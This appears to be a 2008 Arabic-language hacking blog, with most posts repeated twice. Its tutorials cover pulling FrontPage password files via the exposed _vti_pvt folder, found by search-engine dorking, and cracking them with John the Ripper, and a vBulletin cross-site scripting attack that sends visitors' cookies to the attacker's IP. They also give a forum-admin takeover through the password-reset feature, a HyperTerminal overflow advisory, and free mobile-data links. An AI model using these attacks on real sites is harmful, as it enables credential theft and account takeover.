Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============
ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
username : passwd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password
وهذا مضمون الملف
operator:hi9LHn9wAMuKM
حيث اسم المستخدم : operator
الباسوورد المشفرة هي:hi9LHn9wAMuKM
ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
وهذا يتم ببرامج كثير
=(Crack Jack)=
=(John The Ripper)=
راح نستخدم الأفضل والأكثر تداولا وهو
John The Ripper
لتحميل البرنامج من هذا الموقع::
http://www.openwall.com/john
كيف تفك التشفير بهذا البرنامج
أول شي تروح تنقل البرنامج إلى مجلد
:c
بعدين تفتح مجلد RUN
وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها
إذهب إلى
ابدأ start
تشغيل run
اكتب الأمر
command
اضغط على Enter وبعدها راح يفتح
إطار الـDoS
اذهب إلى مجلد RUN
وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر
..cd
حتى توصل
<:c
بعدين اكتب
cd john
اضغط على Enter
وراح يظهر لك بهذا الشكل
<c:john
واكتب
cd RUN
وبتدخل المجلد ليصبح بهذه الطريقة
<c:/john/RUN
ألحين نكتب أوامر برنامج John The Ripper
وهي
====
john -i:all passd.txt
--------------------------
يبحث لك عن جميع الأنواع والاحتمالات
====
john -i:Alpha passwd.txt
----------------------------------
يبحث عن الأحرف الصغيرة
====
john -i: Digits passwd.txt
----------------------------------
يبحث عن الأرقام
====
john -i:single passwd.txt
---------------------------------
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم
--------------------------------------------------------------------------------
وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى
john.pot
الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
--------------------------------------------------------------------------------
إنت ألحين مستريح عندك username والـpassword
وش بقالك ؟!!
يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
frontpage
بعدين
file وتذهب إلى
open web وتضيف
الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك
من FTP
وعليك ببرامج الـFTP المنتشرة
كالـws-ftp
والـpro ftp
والمزيد ...
ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك
======================================
وألحين أكيد تبون تجربون على موقع أقولكم روحوا google
http://www.google.com/
واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة
وعندك محرك بحث
http://www.altavista.com/
تكتب في محرك البحث
link:service.pwd
أو..
link:adminstrators
وغيرها من الملفات الاحتمال وجود password فيها
1-وسف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpage أم لا؟
بعدة طرق ولن أذكر إلا الأسهل:
- بالذهاب إلى موقع netcraft
http://www.netcraft.com/
وكتابة اسم الموقع وبعد البحث سوف يظهر
mod_frontpage/x
x=(رقم الإصدار الخاص بالفرونت بيج)
- عن طريق إضافة جملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/
نضيف الجملة ليصبح بهذه الطريقة
http://www.almodammer.com/_vti_inf.html
وبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج الفرونت بيج
- وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا
بإضافة
vti_cnf_/
بعد عنوان الموقع كهذا المثال:
http://www.almodammer.com/_vti_cnf
واضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به
--------------------------------------------------
2-ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟
بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك
يعني وعلى سبيل المثال
http://www.almodammer.com/
يدعم fontpage طيب نذهب إلى ملف vti_pvt_
كذا يعني
http://www.almodammer.com/_vti_pvt
وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============
ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
username : passwd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password
وهذا مضمون الملف
operator:hi9LHn9wAMuKM
حيث اسم المستخدم : operator
الباسوورد المشفرة هي:hi9LHn9wAMuKM
ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
وهذا يتم ببرامج كثير
=(Crack Jack)=
=(John The Ripper)=
راح نستخدم الأفضل والأكثر تداولا وهو
John The Ripper
لتحميل البرنامج من هذا الموقع::
http://www.openwall.com/john
كيف تفك التشفير بهذا البرنامج
أول شي تروح تنقل البرنامج إلى مجلد
:c
بعدين تفتح مجلد RUN
وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها
إذهب إلى
ابدأ start
تشغيل run
اكتب الأمر
command
اضغط على Enter وبعدها راح يفتح
إطار الـDoS
اذهب إلى مجلد RUN
وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر
..cd
حتى توصل
<:c
بعدين اكتب
cd john
اضغط على Enter
وراح يظهر لك بهذا الشكل
<c:john
واكتب
cd RUN
وبتدخل المجلد ليصبح بهذه الطريقة
<c:/john/RUN
ألحين نكتب أوامر برنامج John The Ripper
وهي
====
john -i:all passd.txt
--------------------------
يبحث لك عن جميع الأنواع والاحتمالات
====
john -i:Alpha passwd.txt
----------------------------------
يبحث عن الأحرف الصغيرة
====
john -i: Digits passwd.txt
----------------------------------
يبحث عن الأرقام
====
john -i:single passwd.txt
---------------------------------
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم
--------------------------------------------------------------------------------
وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى
john.pot
الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
--------------------------------------------------------------------------------
إنت ألحين مستريح عندك username والـpassword
وش بقالك ؟!!
يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
frontpage
بعدين
file وتذهب إلى
open web وتضيف
الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك
من FTP
وعليك ببرامج الـFTP المنتشرة
كالـws-ftp
والـpro ftp
والمزيد ...
ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك
======================================
وألحين أكيد تبون تجربون على موقع أقولكم روحوا google
http://www.google.com/
واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة
وعندك محرك بحث
http://www.altavista.com/
تكتب في محرك البحث
link:service.pwd
أو..
link:adminstrators
وغيرها من الملفات الاحتمال وجود password فيها
الجمعة، 20 يونيو 2008
DETECTER VOTRE ADRESSE IP
bey mr electroman
ouvrer bloc note puis copier coller ce code la et enregister en format .html exepmle index.htm
ouvrer bloc note puis copier coller ce code la et enregister en format .html exepmle index.htm
الخميس، 19 يونيو 2008
الأربعاء، 18 يونيو 2008
ثغرة في Hyper Terminal في نظم Msn
Electroman please your attention
COMMAND
HyperTerminal
SYSTEMS AFFECTED
Win2000 (all versions), Me, 98 and 98SE
PROBLEM
The USSR Team has found a buffer overflow in the HyperTerminal
telnet client, which is in the code that processes the Telnet
URL's, that can enable an attacker to execute arbitrary code on
another user's system. If a user opens an mail containing HTML
and also contains a malformed Telnet URL a buffer overrun will
enable the creator of the mail to cause arbitrary code to be
runned on the user's system.
Example:
telnet://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa/
The other resides in a section of the code that processes session
files - files that enable HyperTerminal users to specify session
parameters such as the connection method and the destination
host. If a user opened a session file that contained a particular
type of malformed information, it would trigger the buffer
overrun.
SOLUTION
Microsoft has re-released original bulletin in May 2001 to inform
customers of the availability of an updated set of patches to
address both the original and a second vulnerability identified
in HyperTerminal. Information about the second issue is discussed
in the PROBLEM section above.
A patch is available to fix this vulnerability. Please read the
Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/ms00-079.asp
for information on obtaining this patch.
COMMAND
HyperTerminal
SYSTEMS AFFECTED
Win2000 (all versions), Me, 98 and 98SE
PROBLEM
The USSR Team has found a buffer overflow in the HyperTerminal
telnet client, which is in the code that processes the Telnet
URL's, that can enable an attacker to execute arbitrary code on
another user's system. If a user opens an mail containing HTML
and also contains a malformed Telnet URL a buffer overrun will
enable the creator of the mail to cause arbitrary code to be
runned on the user's system.
Example:
telnet://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa/
The other resides in a section of the code that processes session
files - files that enable HyperTerminal users to specify session
parameters such as the connection method and the destination
host. If a user opened a session file that contained a particular
type of malformed information, it would trigger the buffer
overrun.
SOLUTION
Microsoft has re-released original bulletin in May 2001 to inform
customers of the availability of an updated set of patches to
address both the original and a second vulnerability identified
in HyperTerminal. Information about the second issue is discussed
in the PROBLEM section above.
A patch is available to fix this vulnerability. Please read the
Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/ms00-079.asp
for information on obtaining this patch.
الثلاثاء، 17 يونيو 2008
الاثنين، 16 يونيو 2008
طريقة اختراق المنتديات
طريقة اختراق المنتديات
الكاتب : لا اعرف عنه اى شئ
اختراق المنتديات بس بمنتديات vb
. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .
أو العنوان التفصيلي التالي :
http://URL/memberlist.php
URL = العنوان المستضيف للمنتدى
مثل = - .com
4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
http://URL/member.php?soitgoe68e45u...info&userid=266
هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
http://URL/member.php?soitgoe68e45u...etinfo&userid=1
العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
http://URL/member.php?action=login&...VALI...39;').'
العنوان هذا ستقوم بتغيير الكلمات التالية
URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .
8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php
ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
الكاتب : لا اعرف عنه اى شئ
اختراق المنتديات بس بمنتديات vb
. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .
أو العنوان التفصيلي التالي :
http://URL/memberlist.php
URL = العنوان المستضيف للمنتدى
مثل = - .com
4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
http://URL/member.php?soitgoe68e45u...info&userid=266
هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
http://URL/member.php?soitgoe68e45u...etinfo&userid=1
العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
http://URL/member.php?action=login&...VALI...39;').'
العنوان هذا ستقوم بتغيير الكلمات التالية
URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .
8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php
ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
الأحد، 15 يونيو 2008
اختراق منتديات الـــ vBulletin
بسم الله الرحمن الرحيم
يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
" أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...
---------
مقدمة :
---------
الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط
ملاحظة : هذه الطريقة لسيت للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
----------
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..
قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
document.write('<img
src="http://my_ip_address/'+document.cookie+'">';
مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
ابحث عن الكود الخاص بالباسورد .. مثال :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
20]=1012444064;%20bblastvi
sit=1011983161
فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..
اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !
------------
الحل
-----------
للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )
كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة فاذا وضعت او او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .
تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .
السريفر الشخصي
http://belnet.dl.sourceforge.net/so...ptriad2-2-1.exe
هذا سريفر الاباتشي
يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
" أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...
---------
مقدمة :
---------
الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط
ملاحظة : هذه الطريقة لسيت للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
----------
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..
قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
src="http://my_ip_address/'+document.cookie+'">';
مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
ابحث عن الكود الخاص بالباسورد .. مثال :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
20]=1012444064;%20bblastvi
sit=1011983161
فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..
اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !
------------
الحل
-----------
للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )
كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .
تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .
السريفر الشخصي
http://belnet.dl.sourceforge.net/so...ptriad2-2-1.exe
هذا سريفر الاباتشي
السبت، 14 يونيو 2008
Imaginer je réalise voila mr elctroman
exclusivités
après des longes recherches pour avoir une stable connections gprs en passant pare les sites comme meebo https://meebo.com ou bie https://imo.com en réaliser notre objectif et en vous présent pour la premier fois et en exclusivités centova la messagerie instantanées de rêve
https://cetanova.net présenter par mr electroman alors dit-e- merci !!!! :D
après des longes recherches pour avoir une stable connections gprs en passant pare les sites comme meebo https://meebo.com ou bie https://imo.com en réaliser notre objectif et en vous présent pour la premier fois et en exclusivités centova la messagerie instantanées de rêve
https://cetanova.net présenter par mr electroman alors dit-e- merci !!!! :D
الجمعة، 13 يونيو 2008
imedia free links ---imedia sites gratuits---
voila une collection des sites web es marche a 100% avec imedia présenter par electroman
wap.meditel.ma.wapamp.com/users9/0katana
wap.meditel.ma.www.goalzz.com
wap.meditel.ma.wap.esato.com/xhtml
wap.meditel.ma.wanawap.com
wap.meditel.ma.waptrick.com
wap.meditel.ma.gamawap.com
wap.meditel.ma.www.3gforfree.com/mobile
wap.meditel.ma.mobile.itsmy.com/umts/index.php3
wap.meditel.ma.dejavuwap.com/xhtmlcommunity/index
wap.meditel.ma.m.radar.net
wap.meditel.ma.m.taptap.net
wap.meditel.ma.wap.gamoku.com
wap.meditel.ma.www.4shared.com
wap.meditel.ma.fotochatter.com/index.php
wap.meditel.ma.m.vtap.com
wap.meditel.ma.ringermobile.com
wap.meditel.ma.wapamp.com/users9/0katana
wap.meditel.ma.www.goalzz.com
wap.meditel.ma.wap.esato.com/xhtml
wap.meditel.ma.wanawap.com
wap.meditel.ma.waptrick.com
wap.meditel.ma.gamawap.com
wap.meditel.ma.www.3gforfree.com/mobile
wap.meditel.ma.mobile.itsmy.com/umts/index.php3
wap.meditel.ma.dejavuwap.com/xhtmlcommunity/index
wap.meditel.ma.m.radar.net
wap.meditel.ma.m.taptap.net
wap.meditel.ma.wap.gamoku.com
wap.meditel.ma.www.4shared.com
wap.meditel.ma.fotochatter.com/index.php
wap.meditel.ma.m.vtap.com
wap.meditel.ma.ringermobile.com
تعرف على
Traceroute
الأمر Traceroute وهو من أوامر الدوس ويستخدم لتتبع المسار حتى الوصول الى العنوان او الموقع المطلوب تتبع المسار له.
فكره تتبع المسار قائمه على فكره بسيطة وهي تزويد حزمه البيانات المرسله من الحاسب بخانه تسمى (Time-to-live) او تختصر بـ TTL و المقصود بها زمن الحياه للحزمة. يوضع في تلك الخانه رقم على سبيل المثال (3) و هذا يعني ان الحزمة ستعيش ثلاثه قفزات (Router) او خادم (Server) خلال تجولها عبر الشبكه.
الذي يحدث كالتالي:
لنسمي النقطة التي يكون فيها محول او خادم في الشبكه بنقطة التوزيع.
يقوم الحاسب بأرسال الحزمة و فيها محدد عمرها برقم وهو TTL عند وصول الحزمة لنقطة التوزيع الأولى (للمحول الأول في الشبكه (Roter) او الخادم) تقوم نقطة التوزيع بتنقيص هذا الرقم بمقدار واحد ثم ترسل الحزمة للنقطة التاليه.
عندما تصل الحزمة لنقطة توزيع بحيث يكون عمر الحزمة صفر بعد انقاص واحد منها ترسل نقطة التوزيع رد لمصدر الحزمة (حاسبك) تخبره عن موت الحزمة (اي توقفها عند تلك النقطة) و ضمن الرد تكون هناك المعلومات.
من الضروري وضع عمر للحزمة و الا ستعج الشبكات بحزم تائه تتنقل من نقطة الى نقطة بدون هدى.
ماذا يحدث عند استخدام الأمر Traceroute ؟
يقوم الحاسب بوضع عمر الحزمة 1 ثم يرسلها فيصله الرد من نقطه التوزيع الأولى (بالعزاء).
فيقوم بارسال الحزمة مرة أخرى لكن بعمر يساوي 2 و بذلك يحصل على رد النقطة الثانيه. و يكرر العمليه حتى يصل الى العنوان فيقوم الحاسب المقصود بالرد من اي منفذ مفتوح لديه.
طريقة استخدام الأمر Traceroute
من نافذه الدوس أكتب الأمر التالي و سنستخدم موقع www.linux.org
او يمكن استخدام رقم تعريف الشبكة IP
C:> tracert 198.182.196.56
لأيقاف امر التتبع أضغط (Ctrl+C)
لحفظ نتيجة التتبع في ملف أضف
tracert www.pmail.com > tracert.txt
ELectroman
أذا رغبت في اضافه بيانات تتبع عدة مواقع في نفس الملف أضف
tracert www.rpmfind.net > tracert.txt
الأمر Traceroute وهو من أوامر الدوس ويستخدم لتتبع المسار حتى الوصول الى العنوان او الموقع المطلوب تتبع المسار له.
فكره تتبع المسار قائمه على فكره بسيطة وهي تزويد حزمه البيانات المرسله من الحاسب بخانه تسمى (Time-to-live) او تختصر بـ TTL و المقصود بها زمن الحياه للحزمة. يوضع في تلك الخانه رقم على سبيل المثال (3) و هذا يعني ان الحزمة ستعيش ثلاثه قفزات (Router) او خادم (Server) خلال تجولها عبر الشبكه.
الذي يحدث كالتالي:
لنسمي النقطة التي يكون فيها محول او خادم في الشبكه بنقطة التوزيع.
يقوم الحاسب بأرسال الحزمة و فيها محدد عمرها برقم وهو TTL عند وصول الحزمة لنقطة التوزيع الأولى (للمحول الأول في الشبكه (Roter) او الخادم) تقوم نقطة التوزيع بتنقيص هذا الرقم بمقدار واحد ثم ترسل الحزمة للنقطة التاليه.
عندما تصل الحزمة لنقطة توزيع بحيث يكون عمر الحزمة صفر بعد انقاص واحد منها ترسل نقطة التوزيع رد لمصدر الحزمة (حاسبك) تخبره عن موت الحزمة (اي توقفها عند تلك النقطة) و ضمن الرد تكون هناك المعلومات.
من الضروري وضع عمر للحزمة و الا ستعج الشبكات بحزم تائه تتنقل من نقطة الى نقطة بدون هدى.
ماذا يحدث عند استخدام الأمر Traceroute ؟
يقوم الحاسب بوضع عمر الحزمة 1 ثم يرسلها فيصله الرد من نقطه التوزيع الأولى (بالعزاء).
فيقوم بارسال الحزمة مرة أخرى لكن بعمر يساوي 2 و بذلك يحصل على رد النقطة الثانيه. و يكرر العمليه حتى يصل الى العنوان فيقوم الحاسب المقصود بالرد من اي منفذ مفتوح لديه.
طريقة استخدام الأمر Traceroute
من نافذه الدوس أكتب الأمر التالي و سنستخدم موقع www.linux.org
او يمكن استخدام رقم تعريف الشبكة IP
C:> tracert 198.182.196.56
لأيقاف امر التتبع أضغط (Ctrl+C)
لحفظ نتيجة التتبع في ملف أضف
tracert www.pmail.com > tracert.txt
ELectroman
أذا رغبت في اضافه بيانات تتبع عدة مواقع في نفس الملف أضف
tracert www.rpmfind.net > tracert.txt
الخميس، 12 يونيو 2008
تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
و سيتناول الموضوع التالي:-
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
أ- استخدام الاداه whois من سطر اوامر لينكس (افضل توزيعه redhat 7.2 )
ب- ملقمات whois الهامه علي مستوي الانترنت
ج- استخدام الاداه sam spade علي ويندوز
د- استخدام الاداه traceroute من سطر اوامر لينكس و الاداه tracert في ويندوز
2 - تقفي اثر الشبكه الداخليه و اسماء نطاقتها
أ-استخدام الاداه nslookup من سطر اوامر لينكس او من سطر الاوامر في ويندوز 2000
3 - معرفه نوع نظام التشغيل
أ-استخدام الاداه المتعدده المهام gif langard
ب-استخدام موقع netcraft لتحديد نظام التشغيل
